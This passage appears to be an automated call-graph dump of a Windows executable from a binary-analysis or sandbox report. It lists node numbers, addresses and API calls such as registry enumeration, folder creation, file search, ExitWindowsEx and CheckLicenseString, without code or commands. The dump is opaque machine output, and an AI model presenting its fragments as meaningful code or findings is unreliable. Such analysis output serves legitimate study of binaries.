1102f014 GetWindowThreadProcessId 80166->80168 80170 11147060 std::locale::_Init 21 API calls 80167->80170 80168->80167 80172 1102efc2 SendMessageA WaitForSingleObject 80169->80172 80173 1102f02f 80170->80173 80172->80166 80175 1102efe2 80172->80175 80173->80144 80177 11147060 std::locale::_Init 21 API calls 80175->80177 80178 1102efec 80177->80178 80178->80166 80179 1102f0b5 80621 11063880 80179->80621 80182 1102f177 80636 11027b20 80182->80636 80184 110b7df0 std::locale::_Init 9 API calls 80185 1102f0e3 80184->80185 80186 11147060 std::locale::_Init 21 API calls 80185->80186 80187 1102f0f2 80186->80187 80203 1102f12e 80187->80203 81399 11062560 57 API calls 80187->81399 80188 1102f19c std::locale::_Init 80191 1102ad70 std::locale::_Init 127 API calls 80188->80191 80198 1102f1b7 80188->80198 80192 1102f1b0 80191->80192 80196 1102ad70 std::locale::_Init 127 API calls 80192->80196 80193 1102f106 80197 1102f172 80193->80197 81400 11062580 127 API calls std::locale::_Init 80193->81400 80196->80198 80197->80182 80197->80203 80656 110287a0 80198->80656 80201 1102f111 80201->80197 80201->80203 80207 1102f11a 80201->80207 80206 1102d900 1178 API calls 80203->80206 81401 11028360 97 API calls 2 library calls 80203->81401 81402 110f64d0 94 API calls 2 library calls 80203->81402 80206->80197 80209 11063880 317 API calls 80207->80209 80209->80203 80522 11143678 80521->80522 80525 1114363e 80521->80525 80523 11142e60 std::locale::_Init 247 API calls 80522->80523 80524 11143680 80523->80524 80524->80106 80525->80522 80526 11143662 80525->80526 81485 11142ee0 249 API calls std::locale::_Init 80526->81485 80528 11143668 80528->80106 81486 11143690 80529->81486 80531 11166654 63 API calls std::locale::_Init 80533 11143795 80531->80533 80532 11143690 IsDBCSLeadByte 80532->80533 80533->80531 80533->80532 80534 1102ec64 80533->80534 80534->80109 81241 11081e70 80534->81241 80536 111101b0 std::locale::_Init 247 API calls 80535->80536 80537 11110e11 80536->80537 80538 111101b0 std::locale::_Init 247 API calls 80537->80538 80543 11110e33 GetCurrentThreadId InitializeCriticalSection 80537->80543 80542 11110e2c std::exception::exception 80538->80542 80540 11110ea0 EnterCriticalSection 80544 11110f5a LeaveCriticalSection 80540->80544 80545 11110ece CreateEventA 80540->80545 80541 11110e93 InitializeCriticalSection 80541->80540 80542->80543 81493 111634b1 RaiseException 80542->81493 80543->80540 80543->80541 80544->80132 80546 11110ee1 80545->80546 80547 11110ef8 80545->80547 81494 11029a70 247 API calls 2 library calls 80546->81494 80549 111101b0 std::locale::_Init 247 API calls 80547->80549 80551 11110eff 80549->80551 80553 11110f1c 80551->80553 80554 11110de0 403 API calls 80551->80554 80555 111101b0 std::locale::_Init 247 API calls 80553->80555 80554->80553 80556 11110f2c 80555->80556 80557 11110f3d 80556->80557 81495 11110280 80556->81495 80559 11110040 403 API calls 80557->80559 80560 11110f55 80559->80560 80560->80544 80562 11061ade 80561->80562 80563 111101b0 std::locale::_Init 247 API calls 80562->80563 80564 11061b0b 80563->80564 80565 111101b0 std::locale::_Init 247 API calls 80564->80565 80567 11061b35 80565->80567 80566 1102eeb3 80566->80141 80567->80566 80568 11142e60 std::locale::_Init 247 API calls 80567->80568 80569 11061b76 80568->80569 81504 11061a70 80569->81504 80572 11061a70 256 API calls 80573 11061b94 80572->80573 80574 11061a70 256 API calls 80573->80574 80574->80566 80576 11061f66 80575->80576 80577 11061f17 80575->80577 80578 11162bb7 __expandlocale 5 API calls 80576->80578 80577->80576 80579 11081e70 64 API calls 80577->80579 81634 11061e10 250 API calls 3 library calls 80577->81634 80581 1102f044 80578->80581 80579->80577 80581->80149 81635 111457a0 80582->81635 80585 111457a0 std::locale::_Init 247 API calls 80586 11146517 wsprintfA 80585->80586 80587 11143e00 std::locale::_Init 8 API calls 80586->80587 80589 11146534 80587->80589 80588 11146560 80591 11162bb7 __expandlocale 5 API calls 80588->80591 80589->80588 80590 11143e00 std::locale::_Init 8 API calls 80589->80590 80592 11146549 80590->80592 80593 1114656c 80591->80593 80592->80588 80594 11146550 80592->80594 80593->80164 80595 11162bb7 __expandlocale 5 API calls 80594->80595 80596 1114655c 80595->80596 80596->80164 80598 111459c7 80597->80598 80599 111459d4 80598->80599 80600 111459e4 std::locale::_Init 80598->80600 80601 111459fe 80598->80601 80603 11142e60 std::locale::_Init 247 API calls 80599->80603 80604 111459f5 GetModuleFileNameA 80600->80604 80602 111457a0 std::locale::_Init 247 API calls 80601->80602 80606 11145a04 80602->80606 80605 11145a58 80603->80605 80604->80606 80607 11162bb7 __expandlocale 5 API calls 80605->80607 80608 11081e00 std::locale::_Init IsDBCSLeadByte 80606->80608 80609 1102f0a3 80607->80609 80608->80599 80610 11143e00 80609->80610 80611 11143e21 CreateFileA 80610->80611 80613 11143ebe CloseHandle 80611->80613 80614 11143e9e 80611->80614 80617 11162bb7 __expandlocale 5 API calls 80613->80617 80615 11143ea2 CreateFileA 80614->80615 80616 11143edb 80614->80616 80615->80613 80615->80616 80619 11162bb7 __expandlocale 5 API calls 80616->80619 80618 11143ed7 80617->80618 80618->80179 80620 11143eea 80619->80620 80620->80179 80622 1105e820 57 API calls 80621->80622 80623 110638a8 80622->80623 81677 110627b0 80623->81677 80625 1102f0d6 80625->80182 80625->80184 80627 1105e950 255 API calls 80628 11063909 std::locale::_Init 80627->80628 80629 1105e820 57 API calls 80628->80629 80630 1106393d 80629->80630 80632 1105e950 255 API calls 80630->80632 80633 1106395c 80630->80633 80631 1105e820 57 API calls 80634 1106398c 80631->80634 80632->80633 80633->80631 80634->80625 80635 1105e950 255 API calls 80634->80635 80635->80625 80637 11061a70 256 API calls 80636->80637 80638 11027b54 80637->80638 80639 1105e820 57 API calls 80638->80639 80641 11027b69 80639->80641 80640 11027bbf LoadIconA 80642 11027bd1 80640->80642 80643 11027bda GetSystemMetrics GetSystemMetrics LoadImageA 80640->80643 80641->80640 80645 11145ef0 std::locale::_Init 68 API calls 80641->80645 80655 11027c38 80641->80655 80642->80643 80646 11027c13 80643->80646 80647 11027bff LoadIconA 80643->80647 80644 11027cec 80648 11162bb7 __expandlocale 5 API calls 80644->80648 80649 11027ba2 LoadLibraryExA 80645->80649 80651 11027c17 GetSystemMetrics GetSystemMetrics LoadImageA 80646->80651 80646->80655 80647->80646 80652 11027cf9 80648->80652 80649->80640 80649->80647 80651->80655 80652->80188 80653 11081e70 64 API calls 80653->80655 80654 11145c70 std::locale::_Init 68 API calls 80654->80655 80655->80644 80655->80653 80655->80654 82256 11061e10 250 API calls 3 library calls 80655->82256 80657 11147060 std::locale::_Init 21 API calls 80656->80657 80658 110287c6 80657->80658 81242 11081e7d 81241->81242 81243 11081e82 81241->81243 83670 11081c50 IsDBCSLeadByte 81242->83670 81244 11081e8b 81243->81244 81250 11081e9f 81243->81250 83671 1116558e 63 API calls __stricmp_l 81244->83671 81247 11081f03 81247->80111 81248 11081e98 81248->80111 81249 11166654 63 API calls std::locale::_Init 81249->81250 81250->81247 81250->81249 81252 11147060 std::locale::_Init 21 API calls 81251->81252 81253 1102d93c 81252->81253 81254 11145ef0 std::locale::_Init 68 API calls 81253->81254 81255 1102d944 81254->81255 81256 1102d979 GetCurrentProcess SetPriorityClass 81255->81256 81257 1102d94d InterlockedIncrement 81255->81257 81260 1102d9ad 81256->81260 81257->81256 81258 1102d95c 81257->81258 81259 11147060 std::locale::_Init 21 API calls 81258->81259 81261 1102d966 81259->81261 81262 1102d9b6 SetEvent 81260->81262 81266 1102d9bd 81260->81266 81263 1102d970 Sleep 81261->81263 81262->81266 81263->81263 81264 1102d9f4 81265 1102da22 81264->81265 83691 1109f5f0 255 API calls std::locale::_Init 81264->83691 83692 11029490 485 API calls std::locale::_Init 81265->83692 81266->81264 83689 11029990 261 API calls 2 library calls 81266->83689 81270 1102d9dd 83690 110ffd70 260 API calls 2 library calls 81270->83690 81271 1102da33 83672 11028690 SetEvent 81271->83672 81274 1102da38 81275 1102da42 81274->81275 81276 1102da4d 81274->81276 83693 110eccf0 627 API calls 81275->83693 81278 1102da6a 81276->81278 81279 1102da6f 81276->81279 83694 11059fb0 SetEvent 81278->83694 81281 1102da77 81279->81281 81282 1102daae 81279->81282 81281->81282 81289 1102daa3 Sleep 81281->81289 81283 11147060 std::locale::_Init 21 API calls 81282->81283 81284 1102dab8 81283->81284 81285 1102dac5 81284->81285 81286 1102daf6 81284->81286 81285->81284 81287 1105e820 57 API calls 81285->81287 81288 1102daf3 81286->81288 81291 1102db5a 81286->81291 81292 1102db0f 81286->81292 81290 1102dae8 81287->81290 81288->81286 81288->81291 81289->81282 81290->81286 83695 1102d750 276 API calls std::locale::_Init 81290->83695 83698 11027580 6 API calls std::ios_base::_Tidy 81291->83698 83673 110b0470 81292->83673 81296 1102db60 81301 1102db7f PostThreadMessageA 81296->81301 81309 1102db9b 81296->81309 81299 1102dbe3 81302 1102dbfd 81299->81302 81313 11147060 std::locale::_Init 21 API calls 81299->81313 83699 11110130 WaitForSingleObject 81301->83699 81306 1102dc3b 81302->81306 83702 11106190 26 API calls std::locale::_Init 81302->83702 81303 1102dbc0 83701 11059f10 DeleteCriticalSection CloseHandle 81303->83701 81305 1102db3a 81395 1102db4d std::ios_base::_Tidy 81305->81395 83697 111361c0 281 API calls 4 library calls 81305->83697 81312 1102dc51 81306->81312 81317 11075fe0 581 API calls 81306->81317 81309->81299 81309->81303 83700 11110130 WaitForSingleObject 81309->83700 81318 11147060 std::locale::_Init 21 API calls 81312->81318 81313->81302 81315 1102dc31 83703 111089e0 567 API calls std::locale::_Init 81315->83703 81317->81312 81321 1102dc5b 81318->81321 81320 1102de59 81324 1102de70 81320->81324 83716 1100d330 wsprintfA 81320->83716 81325 1113d850 293 API calls 81321->81325 81322 1102dc36 83704 11106830 329 API calls std::locale::_Init 81322->83704 81332 1102de97 GetModuleFileNameA GetFileAttributesA 81324->81332 81345 1102dfb3 81324->81345 81326 1102dc60 81325->81326 81330 11147060 std::locale::_Init 21 API calls 81326->81330 81333 1102dc6a 81330->81333 81331 1102de65 81334 11147060 std::locale::_Init 21 API calls 81331->81334 81335 1102debf 81332->81335 81332->81345 81342 1102dc7e std::ios_base::_Tidy 81333->81342 83705 1109dd40 WaitForSingleObject SetEvent WaitForSingleObject CloseHandle 81333->83705 81334->81324 81337 111101b0 std::locale::_Init 247 API calls 81335->81337 81336 11147060 std::locale::_Init 21 API calls 81339 1102e062 81336->81339 81341 1102dec6 81337->81341 83719 11147020 FreeLibrary 81339->83719 81340 11147060 std::locale::_Init 21 API calls 81344 1102dc91 81340->81344 81347 11143630 249 API calls 81341->81347 81358 1102dee8 81341->81358 81342->81340 81355 1102dca5 std::ios_base::_Tidy 81344->81355 83706 1110f350 DeleteCriticalSection std::ios_base::_Tidy 81344->83706 81345->81336 81346 1102e06a 81348 1102e0a6 81346->81348 81353 1102e094 ExitWindowsEx 81346->81353 81354 1102e084 ExitWindowsEx Sleep 81346->81354 81347->81358 81350 1102e0b6 81348->81350 81351 1102e0ab Sleep 81348->81351 81356 11147060 std::locale::_Init 21 API calls 81350->81356 81351->81350 81352 1102dd1f 81364 1102dd30 std::ios_base::_Tidy 81352->81364 83710 11110980 260 API calls 2 library calls 81352->83710 81353->81348 81354->81353 81355->81352 83707 11110920 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 81355->83707 81359 1102e0c0 ExitProcess 81356->81359 81362 11143780 64 API calls 81358->81362 81361 1102dda9 std::ios_base::_Tidy 81365 11147060 std::locale::_Init 21 API calls 81361->81365 81366 1102df0d 81362->81366 81364->81361 83711 11110980 260 API calls 2 library calls 81364->83711 81367 1102ddbc 81365->81367 81366->81345 81369 11081e00 std::locale::_Init IsDBCSLeadByte 81366->81369 81368 1102ddd9 CloseHandle 81367->81368 81372 1108a980 5 API calls 81367->81372 81370 1102ddf4 81368->81370 81376 1102ddfa 81368->81376 81373 1102df23 81369->81373 81375 11163aa5 _free 2 API calls 81370->81375 81371 11147060 std::locale::_Init 21 API calls 81392 1102dccf std::ios_base::_Tidy 81371->81392 81377 1102ddd0 std::ios_base::_Tidy 81372->81377 81374 1102df3e 81373->81374 83717 11029a70 247 API calls 2 library calls 81373->83717 81381 1102df58 FindFirstFileA 81374->81381 81375->81376 81376->81395 83712 11110920 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 81376->83712 81377->81368 81383 1102dfa4 81381->81383 81384 1102df78 FindNextFileA 81381->81384 83718 111273e0 273 API calls 4 library calls 81383->83718 81393 1102df98 FindClose 81384->81393 81385 1102de28 81385->81395 83714 11110980 260 API calls 2 library calls 81385->83714 81386 11163aa5 _free 2 API calls 81389 1102de0c 81386->81389 81389->81385 81389->81386 83713 11110920 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 81389->83713 81392->81352 81392->81371 83708 11067690 29 API calls _free 81392->83708 83709 11110920 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 81392->83709 81393->81383 83715 1100d620 FreeLibrary 81395->83715 81397->80159 81398->80163 81399->80193 81400->80201 81401->80203 81402->80203 81485->80528 81487 111436a6 81486->81487 81488 11143763 81487->81488 81489 11081d30 IsDBCSLeadByte 81487->81489 81488->80533 81490 111436cb 81489->81490 81491 11081d30 IsDBCSLeadByte 81490->81491 81492 111436fb _memmove 81491->81492 81492->80533 81493->80543 81496 11110296 CreateEventA 81495->81496 81497 111102a9 81495->81497 81496->81497 81498 111102b7 81497->81498 81502 1110fff0 InterlockedIncrement 81497->81502 81500 111102c9 81498->81500 81503 11110150 InterlockedIncrement 81498->81503 81500->80557 81502->81498 81503->81500 81507 11061970 81504->81507 81518 11061290 81507->81518 81511 110619cc 81512 11061a08 81511->81512 81517 11061320 256 API calls 81511->81517 81558 11061170 81512->81558 81514 11061a1a 81515 11162bb7 __expandlocale 5 API calls 81514->81515 81516 11061a32 81515->81516 81516->80572 81517->81511 81519 111101b0 std::locale::_Init 247 API calls 81518->81519 81520 110612ac 81519->81520 81521 110612f5 std::exception::exception 81520->81521 81522 110612b3 81520->81522 81570 111634b1 RaiseException 81521->81570 81563 1105ee10 81522->81563 81524 110612eb 81527 11061320 81524->81527 81526 11061319 81528 11061635 81527->81528 81532 11061355 81527->81532 81528->81511 81529 11061624 81530 1105ee10 4 API calls 81529->81530 81530->81528 81531 110614b4 81531->81529 81555 11061542 std::ios_base::_Tidy 81531->81555 81571 110611e0 81531->81571 81532->81531 81534 11061401 RegEnumValueA 81532->81534 81535 11061389 RegQueryInfoKeyA 81532->81535 81536 1106149c 81534->81536 81547 11061435 81534->81547 81537 110613c2 81535->81537 81538 110613ae 81535->81538 81541 11163aa5 _free 2 API calls 81536->81541 81542 110613e2 81537->81542 81578 11029a70 247 API calls 2 library calls 81537->81578 81577 11029a70 247 API calls 2 library calls 81538->81577 81539 11081d30 IsDBCSLeadByte 81539->81547 81543 110614a9 81541->81543 81542->81534 81543->81531 81546 1106146e RegEnumValueA 81546->81536 81546->81547 81547->81539 81547->81546 81550 11081e70 64 API calls 81547->81550 81556 11061649 std::ios_base::_Tidy 81547->81556 81548 110615a0 81548->81555 81583 11029a70 247 API calls 2 library calls 81548->81583 81550->81547 81552 1106151f 81582 1105fdc0 63 API calls _LanguageEnumProc@4 81552->81582 81553 11081d30 IsDBCSLeadByte 81553->81555 81555->81529 81555->81548 81555->81553 81555->81556 81557 11081e70 64 API calls 81555->81557 81556->81511 81557->81555 81559 1105ee10 4 API calls 81558->81559 81560 110611a3 81559->81560 81561 110608e0 3 API calls 81560->81561 81562 110611c2 std::ios_base::_Tidy 81561->81562 81562->81514 81564 1105ee21 LeaveCriticalSection 81563->81564 81565 1105ee2b 81563->81565 81564->81565 81566 1105ee3f 81565->81566 81567 11163aa5 _free 2 API calls 81565->81567 81568 1105ee85 81566->81568 81569 1105ee49 EnterCriticalSection 81566->81569 81567->81566 81568->81524 81569->81524 81570->81526 81572 110611ee 81571->81572 81573 11061208 81571->81573 81584 110608e0 81572->81584 81573->81555 81579 11145bc0 81573->81579 81575 11061200 81592 110610f0 81575->81592 81617 111434c0 81579->81617 81582->81555 81585 110608f4 81584->81585 81586 1106092c 81584->81586 81585->81586 81587 110608f8 81585->81587 81588 11060992 81586->81588 81600 11060470 RaiseException HeapFree GetLastError std::_Xinvalid_argument std::ios_base::_Tidy 81586->81600 81595 110606d0 81587->81595 81588->81575 81602 110609a0 81592->81602 81596 1106070e 81595->81596 81599 110606e3 std::ios_base::_Tidy 81595->81599 81596->81575 81597 110606d0 2 API calls 81597->81599 81599->81596 81599->81597 81601 1105fea0 HeapFree GetLastError std::ios_base::_Tidy _free 81599->81601 81600->81586 81601->81599 81603 11060a24 81602->81603 81604 110609df 81602->81604 81603->81573 81610 11060820 81604->81610 81606 110609ea 81607 110609a0 248 API calls 81606->81607 81608 11060a16 81607->81608 81609 110609a0 248 API calls 81608->81609 81609->81603 81611 111101b0 std::locale::_Init 247 API calls 81610->81611 81613 11060854 std::exception::exception 81611->81613 81612 11060862 81612->81606 81613->81612 81616 111634b1 RaiseException 81613->81616 81615 110608dd 81616->81615 81618 111434d0 81617->81618 81621 111433d0 81618->81621 81620 11143506 81620->81552 81622 11143422 __crtLCMapStringA_stat 81621->81622 81623 111433e7 _strncpy 81621->81623 81632 11143300 MultiByteToWideChar 81622->81632 81623->81623 81625 11162bb7 __expandlocale 5 API calls 81623->81625 81627 1114341e 81625->81627 81626 11143452 81633 11143340 WideCharToMultiByte GetLastError 81626->81633 81627->81620 81629 11143466 81630 11162bb7 __expandlocale 5 API calls 81629->81630 81631 11143479 81630->81631 81631->81620 81632->81626 81633->81629 81634->80577 81636 111457c2 81635->81636 81640 111457d9 std::locale::_Init 81635->81640 81675 11029a70 247 API calls 2 library calls 81636->81675 81639 11145967 81641 11162bb7 __expandlocale 5 API calls 81639->81641 81640->81639 81642 1114580c GetModuleFileNameA 81640->81642 81643 11145983 wsprintfA 81641->81643 81644 11081e00 std::locale::_Init IsDBCSLeadByte 81642->81644 81643->80585 81645 11145821 81644->81645 81646 11145831 SHGetFolderPathA 81645->81646 81658 11145918 81645->81658 81647 1114585e 81646->81647 81648 1114587d SHGetFolderPathA 81646->81648 81647->81648 81651 11145864 81647->81651 81652 111458b2 std::locale::_Init 81648->81652 81649 11142e60 std::locale::_Init 244 API calls 81649->81639 81676 11029a70 247 API calls 2 library calls 81651->81676 81655 1102ad70 std::locale::_Init 127 API calls 81652->81655 81656 111458c3 81655->81656 81659 11145240 81656->81659 81658->81649 81660 111452ca 81659->81660 81661 1114524b 81659->81661 81660->81658 81661->81660 81662 1114525b GetFileAttributesA 81661->81662 81663 11145267 81662->81663 81664 11145275 __strdup 81662->81664 81663->81658 81665 11081e00 std::locale::_Init IsDBCSLeadByte 81664->81665 81666 11145286 81665->81666 81667 11145240 std::locale::_Init 3 API calls 81666->81667 81673 111452a3 81666->81673 81668 11145296 81667->81668 81669 111452ac 81668->81669 81670 1114529e 81668->81670 81672 11163aa5 _free 2 API calls 81669->81672 81671 11163aa5 _free 2 API calls 81670->81671 81671->81673 81674 111452b1 CreateDirectoryA 81672->81674 81673->81658 81674->81673 81803 11145a70 81677->81803 81679 1106283c 81812 110d1930 81679->81812 81682 110637a8 81687 110d0a10 247 API calls 81682->81687 81683 11062a37 81686 1116535d _fgets 19 API calls 81683->81686 81685 11164c77 std::locale::_Init 80 API calls 81685->81682 81689 11062a51 81686->81689 81789 11062931 std::ios_base::_Tidy 81687->81789 81688 110628e7 81690 110628ee 81688->81690 81704 1106293d _strpbrk std::locale::_Init 81688->81704 81692 11062a58 81689->81692 81696 11062ab7 _strpbrk 81689->81696 81691 11062923 81690->81691 81694 11164c77 std::locale::_Init 80 API calls 81690->81694 81869 110d0a10 81691->81869 81693 11062a9d 81692->81693 81699 11164c77 std::locale::_Init 80 API calls 81692->81699 81700 110d0a10 247 API calls 81693->81700 81694->81691 81830 11164536 81696->81830 81698 11162bb7 __expandlocale 5 API calls 81702 110637df 81698->81702 81699->81693 81700->81789 81702->80625 81702->80627 81702->80628 81705 11163ca7 std::locale::_Init 57 API calls 81704->81705 81706 110629ad 81705->81706 81707 11145b10 8 API calls 81706->81707 81709 110629c9 81707->81709 81708 1116535d _fgets 19 API calls 81757 11062afc _strpbrk std::locale::_Init std::ios_base::_Tidy 81708->81757 81709->81683 81716 110629d8 81709->81716 81710 11062f1a 81711 11062f58 81710->81711 81890 1105e910 81710->81890 81713 11062f78 81711->81713 81894 11062220 81711->81894 81715 11063016 81713->81715 81725 11062f9b std::ios_base::_Tidy 81713->81725 81722 11063051 GetTickCount 81715->81722 81723 1106301a std::ios_base::_Tidy 81715->81723 81717 11062a1d 81716->81717 81720 11164c77 std::locale::_Init 80 API calls 81716->81720 81721 110d0a10 247 API calls 81717->81721 81720->81717 81721->81789 81724 11143a50 127 API calls 81722->81724 81727 11026170 80 API calls 81723->81727 81726 11063069 CheckLicenseString wsprintfA 81724->81726 81728 11026170 80 API calls 81725->81728 81729 110630a0 std::locale::_Init 81726->81729 81727->81789 81728->81789 81730 110630c2 ExitProcess 81729->81730 81731 1105e820 57 API calls 81729->81731 81735 11062864 std::ios_base::_Tidy 81735->81682 81735->81685 81737 11147ad0 249 API calls 81737->81757 81738 110630ec std::ios_base::_Tidy 81739 11026170 80 API calls 81738->81739 81739->81789 81741 11081d30 IsDBCSLeadByte 81741->81757 81742 11142e60 std::locale::_Init 247 API calls 81742->81757 81743 11062d25 std::ios_base::_Tidy 81878 11026170 81743->81878 81748 11081e70 64 API calls 81748->81757 81750 11062e88 GetTickCount CheckLicenseString wsprintfA 81755 11062ed0 std::locale::_Init 81750->81755 81751 11163ca7 std::locale::_Init 57 API calls 81751->81757 81752 1105e910 255 API calls 81752->81757 81755->81730 81755->81757 81757->81708 81757->81710 81757->81735 81757->81737 81757->81738 81757->81741 81757->81742 81757->81743 81757->81748 81757->81750 81757->81751 81757->81752 81758 11146710 253 API calls 81757->81758 81882 110820b0 81757->81882 81758->81757 81789->81698 81805 11145a83 std::ios_base::_Tidy 81803->81805 81804 11145990 249 API calls 81804->81805 81805->81804 81806 11164ead std::locale::_Init 125 API calls 81805->81806 81807 11145aea std::ios_base::_Tidy 81805->81807 81808 11145aa5 GetLastError 81805->81808 81806->81805 81807->81679 81808->81805 81809 11145ab0 Sleep 81808->81809 81810 11164ead std::locale::_Init 125 API calls 81809->81810 81811 11145ac2 81810->81811 81811->81805 81811->81807 81915 110d16d0 81812->81915 81815 110d197b 81817 11062850 81815->81817 81818 110d1978 81815->81818 81816 110d1964 81929 11029a70 247 API calls 2 library calls 81816->81929 81817->81683 81817->81735 81822 1116535d 81817->81822 81818->81815 81930 11029a70 247 API calls 2 library calls 81818->81930 81823 11165369 _doexit 81822->81823 81824 1116be59 __lock_file EnterCriticalSection 81823->81824 81825 1116537c _doexit 81823->81825 81828 111653bb __flsbuf 81824->81828 81825->81688 81826 1116545e 81994 1116548d LeaveCriticalSection LeaveCriticalSection __fsopen 81826->81994 81828->81826 81988 11172885 81828->81988 81831 1116454f 81830->81831 81832 111642e0 strtoxl 57 API calls 81831->81832 81833 11062ae1 81832->81833 81834 11145b10 81833->81834 81835 11145b62 __crtLCMapStringA_stat 81834->81835 81836 11145b27 _strncpy 81834->81836 82043 11143300 MultiByteToWideChar 81835->82043 81837 11162bb7 __expandlocale 5 API calls 81836->81837 81839 11145b5e 81837->81839 81839->81757 81840 11145b94 82044 11143340 WideCharToMultiByte GetLastError 81840->82044 81842 11145ba6 81843 11162bb7 __expandlocale 5 API calls 81842->81843 81844 11145bb9 81843->81844 81844->81757 82165 110d0810 81869->82165 81872 110d0a39 81874 11163aa5 _free 2 API calls 81872->81874 81873 110d0a22 82169 11029a70 247 API calls 2 library calls 81873->82169 81876 110d0a42 81874->81876 81876->81789 81879 11026180 81878->81879 81880 1102617a 81878->81880 81881 11164c77 std::locale::_Init 80 API calls 81880->81881 81881->81879 81883 110820cf 81882->81883 81884 110820d4 81882->81884 82175 11081c50 IsDBCSLeadByte 81883->82175 82170 11163ed6 81884->82170 81888 11162bb7 __expandlocale 5 API calls 81889 110820ea 81888->81889 81889->81757 81891 1105e91c 81890->81891 81891->81891 82176 11063820 81891->82176 81895 11062266 RegOpenKeyExA 81894->81895 81896 11062288 81895->81896 81901 11062260 81895->81901 82254 11061c60 259 API calls 2 library calls 81896->82254 81898 110623e5 81902 11162bb7 __expandlocale 5 API calls 81898->81902 81899 1106229b RegEnumKeyExA 81903 11062399 RegCloseKey 81899->81903 81909 110622d9 std::ios_base::_Tidy 81899->81909 81900 1105e820 57 API calls 81900->81901 81901->81895 81901->81898 81901->81900 81904 110623f2 81902->81904 81903->81901 81904->81713 81905 11081e70 64 API calls 81905->81909 81906 1106235d RegEnumKeyExA 81906->81909 81907 11147ad0 249 API calls 81907->81909 81909->81903 81909->81905 81909->81906 81909->81907 82255 11061c60 259 API calls 2 library calls 81909->82255 81916 110d16dc 81915->81916 81917 110d16f7 81916->81917 81918 110d16e0 81916->81918 81931 110d03e0 81917->81931 81960 11029a70 247 API calls 2 library calls 81918->81960 81925 110d172e 81925->81815 81925->81816 81926 110d1717 81961 11029a70 247 API calls 2 library calls 81926->81961 81932 110d03e9 81931->81932 81933 110d03ed 81932->81933 81935 110d0404 81932->81935 81962 11029a70 247 API calls 2 library calls 81933->81962 81936 110d0438 81935->81936 81937 110d0401 81935->81937 81939 110d0435 81936->81939 81940 110d0456 81936->81940 81937->81935 81963 11029a70 247 API calls 2 library calls 81937->81963 81939->81936 81964 11029a70 247 API calls 2 library calls 81939->81964 81943 110d12e0 81940->81943 81944 110d12ee 81943->81944 81945 110d1309 81944->81945 81946 110d12f2 81944->81946 81948 110d1306 81945->81948 81950 110d133c 81945->81950 81965 11029a70 247 API calls 2 library calls 81946->81965 81948->81945 81966 11029a70 247 API calls 2 library calls 81948->81966 81949 110d13b0 81949->81925 81949->81926 81950->81949 81950->81950 81967 110d0c30 81950->81967 81956 110d136f _memmove 81956->81949 81957 110d1399 81956->81957 81979 11029a70 247 API calls 2 library calls 81957->81979 81968 110d0c3d 81967->81968 81969 110d0c58 81968->81969 81970 110d0c41 81968->81970 81971 110d0c55 81969->81971 81972 110d0c76 81969->81972 81985 11029a70 247 API calls 2 library calls 81970->81985 81971->81969 81986 11029a70 247 API calls 2 library calls 81971->81986 81980 110d06a0 81972->81980 81978 110d0b70 250 API calls 2 library calls 81978->81956 81981 110d06ab 81980->81981 81982 110d06c2 81980->81982 81987 11029a70 247 API calls 2 library calls 81981->81987 81982->81956 81982->81978 81989 111728a7 81988->81989 81993 11172892 __flsbuf 81988->81993 81991 111728dc __flsbuf 81989->81991 81989->81993 82003 11177ff0 Sleep __malloc_crt 81989->82003 81995 11175650 81991->81995 81993->81828 81994->81825 81996 1117565c _doexit 81995->81996 81997 111778c4 ___lock_fhandle 3 API calls 81996->81997 81999 11175664 _doexit __waccess_s 81996->81999 81998 111756ed 81997->81998 82001 11175707 __waccess_s 81998->82001 82004 11175099 81998->82004 81999->81993 82037 1117573e LeaveCriticalSection __unlock_fhandle 82001->82037 82003->81991 82005 111750d0 82004->82005 82006 111750b5 __waccess_s 82004->82006 82005->82006 82007 111751aa 82005->82007 82008 11175165 82005->82008 82006->82001 82038 1116ac39 Sleep 82007->82038 82008->82006 82009 1117527e ReadFile 82008->82009 82012 11175613 GetLastError 82009->82012 82013 1117529b 82009->82013 82011 111751b5 82018 111751bf __waccess_s 82011->82018 82039 11176489 SetFilePointer GetLastError __dosmaperr __chsize_nolock 82011->82039 82014 1117541a __dosmaperr __waccess_s 82012->82014 82013->82012 82015 111752af 82013->82015 82014->82006 82019 11163aa5 _free 2 API calls 82014->82019 82015->82014 82021 111752cb 82015->82021 82027 111754df 82015->82027 82017 111751eb 82017->82008 82018->82006 82019->82006 82020 111753ac 82020->82014 82033 1117545e 82020->82033 82034 111753e4 82020->82034 82021->82020 82022 1117532f ReadFile 82021->82022 82026 1117534d GetLastError 82022->82026 82029 11175357 82022->82029 82023 11175554 ReadFile 82024 11175573 GetLastError 82023->82024 82030 1117557d 82023->82030 82024->82027 82024->82030 82025 11175470 MultiByteToWideChar 82025->82014 82028 11175494 GetLastError 82025->82028 82026->82021 82026->82029 82027->82014 82027->82023 82028->82014 82029->82021 82040 11176489 SetFilePointer GetLastError __dosmaperr __chsize_nolock 82029->82040 82030->82027 82042 11176489 SetFilePointer GetLastError __dosmaperr __chsize_nolock 82030->82042 82041 11176489 SetFilePointer GetLastError __dosmaperr __chsize_nolock 82033->82041 82034->82025 82036 1117546d 82036->82025 82037->81999 82038->82011 82039->82017 82040->82029 82041->82036 82042->82030 82043->81840 82044->81842 82166 110d0829 82165->82166 82168 110d083c 82165->82168 82167 110d06a0 247 API calls 82166->82167 82166->82168 82167->82168 82168->81872 82168->81873 82171 1116c675 __expandlocale 34 API calls 82170->82171 82172 11163ef9 82171->82172 82173 11162bb7 __expandlocale 5 API calls 82172->82173 82174 110820db 82173->82174 82174->81888 82175->81884 82179 11062090 82176->82179 82180 110620a6 82179->82180 82190 110620db 82179->82190 82182 11081d30 IsDBCSLeadByte 82180->82182 82184 110620ae 82182->82184 82185 110620b7 82184->82185 82186 110620ce 82184->82186 82191 11060a60 82190->82191 82192 11060ac7 EnterCriticalSection 82191->82192 82194 11060b0b 82192->82194 82254->81899 82255->81909 82256->80655 83670->81243 83671->81248 83672->81274 83720 110808b0 83673->83720 83678 1102db1a 83682 110eb4a0 83678->83682 83679 110b04b7 83732 11029a70 247 API calls 2 library calls 83679->83732 83683 110b0470 249 API calls 83682->83683 83684 110eb4cd 83683->83684 83748 110ea880 83684->83748 83688 1102db25 83696 110b0660 249 API calls std::locale::_Init 83688->83696 83689->81270 83690->81264 83691->81265 83692->81271 